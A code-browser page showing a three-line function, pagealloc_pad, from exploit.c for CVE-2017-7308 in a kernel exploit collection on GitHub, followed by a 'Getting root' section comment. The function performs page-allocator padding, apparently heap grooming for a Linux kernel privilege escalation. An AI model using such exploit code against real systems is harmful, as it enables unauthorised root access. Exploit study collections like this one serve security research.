MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / pagealloc_pad

Function pagealloc_pad

CVE-2017-7308/exploit.c:254–256  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

252}
253
254void pagealloc_pad(int count) {
255 packet_socket_setup(0x8000, 2048, count, 0, 100);
256}
257
258// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
259

Callers 1

mainFunction · 0.70

Calls 1

packet_socket_setupFunction · 0.70

Tested by

no test coverage detected